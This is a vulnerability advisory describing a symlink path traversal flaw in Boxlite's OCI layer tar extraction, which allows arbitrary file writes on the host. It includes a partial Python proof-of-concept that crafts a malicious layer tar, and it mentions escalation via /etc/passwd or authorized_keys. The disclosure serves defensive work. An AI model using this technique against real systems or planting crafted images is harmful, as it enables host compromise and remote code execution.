Description

Boxlite: Path Traversal Vulnerability Leads to Arbitrary File Write on the Host #### Summary Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. #### Details 1. Entry Point — OCI Layer Tarball Extraction File: boxlite/src/images/archive/tar.rs Function: extract_layer_tarball_streaming() (line 24) Code: rust pub fn extract_layer_tarball_streaming(tarball_path: &Path, dest: &Path) -> BoxliteResult<u64> { // ... apply_oci_layer(reader, dest) } Issue: The function passes the tar reader into apply_oci_layer. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest — but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest. 2. Main Extraction Loop — Symlink Created Without Target Validation File: boxlite/src/images/archive/tar.rs Function: apply_oci_layer() (line 196) Code: rust EntryType::Symlink => { let target = link_name.ok_or_else(|| { /* ... */ })?; create_symlink(&full_path, &target)?; // line 327 — target is NOT validated } Issue: The symlink's full_path (the link itself) is sanitized by normalize_entry_path to stay within dest. However, the target (what the symlink points to) is never validated. An entry with path usr and link target /etc creates {dest}/usr -> /etc, a symlink pointing outside the extraction root. There is no check that target stays within dest, is relative, or doesn't escape the container root. 3. Symlink Target Written Verbatim File: boxlite/src/images/archive/tar.rs Function: create_symlink() (line 747) Code: rust fn create_symlink(path: &Path, target: &Path) -> BoxliteResult<()> { std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ }) } Issue: std::os::unix::fs::symlink is an lstat-level operation — it creates the symlink with the provided target string verbatim, no matter what it contains. If target is /etc, the link records /etc as the target. No containment check. 4. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks File: boxlite/src/images/archive/tar.rs Function: ensure_parent_dirs() (line 457) Code: rust Ok(m) if m.file_type().is_symlink() => { // Check if symlink points to a directory match fs::metadata(current_check) { // follows symlink Ok(target_m) if target_m.is_dir() => { trace!("Preserving symlink that points to directory: ..."); break; // line 516 — stop, keep the symlink, treat as valid parent } Issue: When the next tar entry has path usr/passwd and the code calls ensure_parent_dirs("{dest}/usr/passwd", dest), it walks up to {dest}/usr, finds it is a symlink pointing to a directory (e.g., /etc), and explicitly breaks the loop to preserve it — treating the out-of-root symlink as a valid, navigable parent. The create_dir_all call is then skipped for this path. The caller proceeds to open and write {dest}/usr/passwd, which the kernel resolves through the symlink to /etc/passwd. 5. File Written Through Escaped Symlink File: boxlite/src/images/archive/tar.rs Function: create_regular_file() (line 715) Code: rust fn create_regular_file<R: Read>(entry: &mut Entry<R>, path: &Path, mode: u32) -> BoxliteResult<()> { let mut file = OpenOptions::new() .write(true).create(true).truncate(true).mode(mode) .open(path) // path = "{dest}/usr/passwd" which kernel follows to "/etc/passwd" .map_err(|e| { /* ... */ })?; io::copy(entry, &mut file)?; // attacker-controlled content written to /etc/passwd Ok(()) } Issue: OpenOptions::open() follows symlinks in path components by default. The kernel resolves {dest}/usr/passwd → {dest}/usr is a symlink to /etc → file opened at /etc/passwd. Attacker-controlled tar entry content is copied there verbatim. As seen from the code, when a tar entry is a symlink, Boxlite's security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker's public key into the host's authorized_keys. #### PoC 1. Install Boxlite following the official tutorial. 2. Run the following Python script: ```python #!/usr/bin/env python3 """ PoC: BoxLite OCI Layer Extraction Symlink Escape ================================================= Vulnerability: boxlite/src/images/archive/tar.rs — extract_layer_tarball_streaming() Type: CWE-61 / CAPEC-132 — Symlink Following during tar extraction Attack: OCI images consist of layer tarballs extracted on the host to build the ext4 base image. If the extractor follows a symlink without verifying the resolved path stays within the extraction root, an attacker can craft a tar like: [1] SYMLINK escape -> /tmp (points to host /tmp) [2] FILE escape/poc/pwned.txt (resolves via [1] to /tmp/poc/pwned.txt) KVM hardware isolation is irrelevant here — tar extraction happens in the host process before the VM ever starts. Target write: /tmp/boxlite_host_escape/pwned.txt Expected isolation boundary: boxlite internal staging dir under /tmp """ import asyncio import hashlib import io import json import os import shutil import tarfile import time TARGET_FILE = "/tmp/boxlite_host_escape/pwned.txt" OCI_LAYOUT_DIR = "/tmp/malicious_oci_layout" # ── Helpers ─────────────────────────────────────────────────────────────────── def sha256hex(data: bytes) -> str: return hashlib.sha256(data).hexdigest() def add_entry( tf: tarfile.TarFile, name: str, type_: bytes, linkname: str = "", data: bytes = b"", mode: int = 0o644, ): info = tarfile.TarInfo(name=name) info.type = type_ info.linkname = linkname info.size = len(data) info.mode = mode info.mtime = int(time.time()) tf.addfile(info, io.BytesIO(data) if data else None) # ── Step 1: Build malicious OCI layer tar ───────────────────────────────────── def build_layer_tar() -> bytes: """ Tar entries (order matters): [1] SYMLINK escape -> /tmp [2] DIR escape/boxlite_host_escape/ (resolves to /tmp/boxlite_host_escape/) [3] FILE escape/boxlite_host_escape/pwned.txt (resolves to /tmp/…/pwned.txt) [4] FILE etc/os-release (legitimate-looking decoy entries) """ payload = ( "===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n" f"Written at: {time.strftime('%Y-%m-%d %H:%M:%S')}\n" f"Target: {TARGET_FILE}\n" "========================================================\n" ).encode() buf = io.BytesIO() with tarfile.open(fileobj=buf, mode="w") as tf: add_entry(tf, "escape", tarfile.SYMTYPE, linkname="/tmp", mode=0o777) add_entry(tf, "escape/boxlite_host_escape", tarfile.DIRTYPE, mode=0o755) add_entry( tf, "escape/boxlite_host_escape/pwned.txt", tarfile.REGTYPE, data=payload ) add_entry( tf, "etc/os-release", tarfile.REGTYPE, data=b"ID=alpine\nVERSION_ID=3.19.0\n", ) return buf.getvalue() # ── Step 2: Build OCI image

Mitigation

Aliases

References